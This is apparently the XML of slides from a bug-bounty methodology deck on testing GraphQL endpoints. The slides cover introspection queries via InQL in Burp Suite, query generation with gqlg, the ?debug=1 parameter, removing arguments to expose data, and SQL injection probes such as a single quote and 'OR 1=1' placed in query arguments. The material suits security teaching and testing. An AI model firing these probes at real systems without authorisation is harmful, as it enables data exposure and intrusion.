            <a:ext cx="7983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41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Note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12" name="Google Shape;21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400" y="150875"/>
            <a:ext cx="1278801" cy="127880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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140700" y="1396250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600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394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InQL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Burp Suite</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397800" y="2675525"/>
            <a:ext cx="83484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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to produce :-</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Download InQL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Load inql.py As Python Extension Inside Burp Suite</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Switch To InQL Scan Tab</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Enter Your Target e.g. https://www.company.com/graphql </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="130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2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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Introspection Query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, To Get All Objects To Help You To Expose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Sensitive Information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20" name="Google Shape;220;p42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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /graphql?query=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{__schema{types{name,fields{name}}}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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User-Agent: Mozilla/5.0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Referer: https://previous.com/path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Origin: https://www.company.com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221" name="Google Shape;221;p42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2" name="Google Shape;222;p42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2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24" name="Google Shape;2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42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6" name="Google Shape;226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2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28" name="Google Shape;228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73200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42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0" name="Google Shape;230;p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22925" y="34872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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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32" name="Google Shape;232;p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2925" y="39338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8" name="Google Shape;238;p43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43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40" name="Google Shape;240;p43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Found </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Introspection Query</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To Use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graphql-visualizer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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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View The Model Relationships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1" name="Google Shape;241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43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Steps to produce :-</a:t>
            </a:r>
            <a:endParaRPr b="1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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Copy The Introspection Query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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Put It Into The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introspection Query Field</a:t>
            </a:r>
            <a:endParaRPr b="1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FF00"/>
              </a:solidFill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50" name="Google Shape;250;p44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44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252" name="Google Shape;252;p44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If You Found </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Introspection Query</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To Use Tools e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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gql-generator</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Make A List Of Pasteable Query Strings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3" name="Google Shape;253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4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55" name="Google Shape;255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44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Steps to produce :-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1 -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Open Your Terminal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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write This Command</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="3644200"/>
            <a:ext cx="4612800" cy="3150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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@mine:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gqlg --schemaFilePath file.graphql --destDirPath output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="3993203"/>
            <a:ext cx="4612800" cy="3150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</a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--schemaFilePath file.graphql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Contains The Introspection Query</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Google Shape;259;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316450" y="4342206"/>
            <a:ext cx="4612800" cy="315000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-destDirPath output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "     Directory Of Saving The Queries Generated</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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Append ?debug=1 To URL Of GraphQL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get More Verbose Results</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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65" name="Google Shape;265;p45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/graphql</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>debug=1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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query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user(name: "me ")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edges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    node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	phone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   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 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}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266" name="Google Shape;266;p45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67" name="Google Shape;267;p45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5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69" name="Google Shape;26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45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71" name="Google Shape;271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6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Remove Object </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, To Expose Sensitive Information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77" name="Google Shape;277;p46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/graphql HTTP/1.1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query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user(name: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"me"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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edges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    node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	phone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   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 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}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79" name="Google Shape;279;p46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6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6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3" name="Google Shape;28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38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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3436175" y="3707675"/>
            <a:ext cx="975600" cy="7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85" name="Google Shape;285;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3436175" y="4326350"/>
            <a:ext cx="975600" cy="72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86" name="Google Shape;286;p46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7" name="Google Shape;287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8277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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="346005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64025" y="3544600"/>
            <a:ext cx="421000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Inject Single Quote ' </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All The Arguments To Detect SQLi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/graphql HTTP/1.1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query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user(name: "me </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")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edges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    node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	phone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   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 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}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296" name="Google Shape;296;p47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97" name="Google Shape;297;p47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7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299" name="Google Shape;2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47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Writeup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1" name="Google Shape;301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8350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47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625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Video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03" name="Google Shape;303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2925" y="308277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9999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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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rgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject Boolean-Based SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. OR 1=1'  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In All The Arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get SQLi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="20715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POST /graphql HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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Host: company.com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Content-Length: Number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query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user(name: "me </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")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edges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    node {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	phone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   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	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        }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000"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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="164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Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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11" name="Google Shape;311;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="6705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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj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My Methodology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313" name="Google Shape;313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38" y="-146801"/>
            <a:ext cx="1216525" cy="1181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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="312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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315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2925" y="2675525"/>
            <a:ext cx="503200" cy="3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